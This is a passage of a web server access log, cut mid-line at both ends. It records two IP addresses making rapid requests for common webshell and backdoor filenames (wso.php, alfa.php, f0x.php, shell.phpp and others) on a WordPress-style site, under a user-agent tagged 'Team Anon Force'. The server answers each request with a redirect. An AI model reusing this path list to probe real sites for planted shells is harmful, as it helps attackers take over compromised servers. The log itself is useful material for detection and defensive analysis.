AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:28 +0700] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:29 +0700] "GET /wp-content/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:31 +0700] "GET /wp-admin/user/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:32 +0700] "GET /wp-includes/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:34 +0700] "GET /wp-admin/images/admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:35 +0700] "GET /wp-includes/Text/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:41 +0700] "GET /wp-admin/network/admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:43 +0700] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:44 +0700] "GET /wp-admin/network/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:47 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:48 +0700] "GET /wp-content/uploads/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:49 +0700] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:51 +0700] "GET /wp-content/plugins/wp-diambar/includes/loadme.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:52 +0700] "GET /wp-content/plugins/zaen/includes/loadme.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:53 +0700] "GET /wp-content/plugins/zedd/1.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:54 +0700] "GET /wp-content/plugins/cakil/up.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:56 +0700] "GET /wp-content/wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:57 +0700] "GET /wp-content/wp/plugins/mbt.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:58 +0700] "GET /wp-content/plugins/wp-freeform/black2llleaf.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:59 +0700] "GET /wp-includes/wp-class.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:00 +0700] "GET /wp-content/plugins/mar.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:02 +0700] "GET /wp-admin/maint/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:06 +0700] "GET /wp-includes/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:12 +0700] "GET /wp-includes/shell.phpp HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:18 +0700] "GET /wp-content/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:24 +0700] "GET /wp-admin/alfa.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:29 +0700] "GET /wp-includes/upload.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:32 +0700] "GET /wp-admin/css/up.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:34 +0700] "GET /marijuana.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:35 +0700] "GET /wp-admin/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:36 +0700] "GET /wp-content/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:38 +0700] "GET /wp-includes/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:39 +0700] "GET /alfa.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:41 +0700] "GET /wp-includes/wp-class.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:42 +0700] "GET /wp-admin/includes/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:43 +0700] "GET /.well-known/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:45 +0700] "GET /images/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:46 +0700] "GET /WSO.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:48 +0700] "GET /lock360.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:49 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:22:50 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:01 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:03 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:06 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:08 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:11 +0700] "GET /chosen.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:13 +0700] "GET /mah.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:16 +0700] "GET /wp-admin/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:19 +0700] "GET /wp-content/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:21 +0700] "GET /wp-admin/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:24 +0700] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:26 +0700] "GET /wp-content/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:28 +0700] "GET /wp-admin/user/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:31 +0700] "GET /wp-includes/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:33 +0700] "GET /wp-admin/images/admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:36 +0700] "GET /wp-includes/Text/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:38 +0700] "GET /wp-admin/network/admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:43 +0700] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:45 +0700] "GET /wp-admin/network/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:48 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:50 +0700] "GET /wp-content/uploads/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:52 +0700] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:53 +0700] "GET /wp-content/plugins/wp-diambar/includes/loadme.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:55 +0700] "GET /wp-content/plugins/zaen/includes/loadme.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:15:58 +0700] "GET /wp-content/plugins/zedd/1.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:00 +0700] "GET /wp-content/plugins/cakil/up.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:02 +0700] "GET /wp-content/wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:04 +0700] "GET /wp-content/wp/plugins/mbt.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:06 +0700] "GET /wp-content/plugins/wp-freeform/black2llleaf.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:08 +0700] "GET /wp-includes/wp-class.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:10 +0700] "GET /wp-content/plugins/mar.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:12 +0700] "GET /wp-admin/maint/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:14 +0700] "GET /wp-includes/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:17 +0700] "GET /wp-includes/shell.phpp HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:19 +0700] "GET /wp-content/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:21 +0700] "GET /wp-admin/alfa.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:23 +0700] "GET /wp-includes/upload.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:25 +0700] "GET /wp-admin/css/up.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:27 +0700] "GET /marijuana.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:29 +0700] "GET /wp-admin/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:31 +0700] "GET /wp-content/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:33 +0700] "GET /wp-includes/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:35 +0700] "GET /alfa.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:37 +0700] "GET /wp-includes/wp-class.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:39 +0700] "GET /wp-admin/includes/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:41 +0700] "GET /.well-known/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:43 +0700] "GET /images/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:45 +0700] "GET /WSO.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 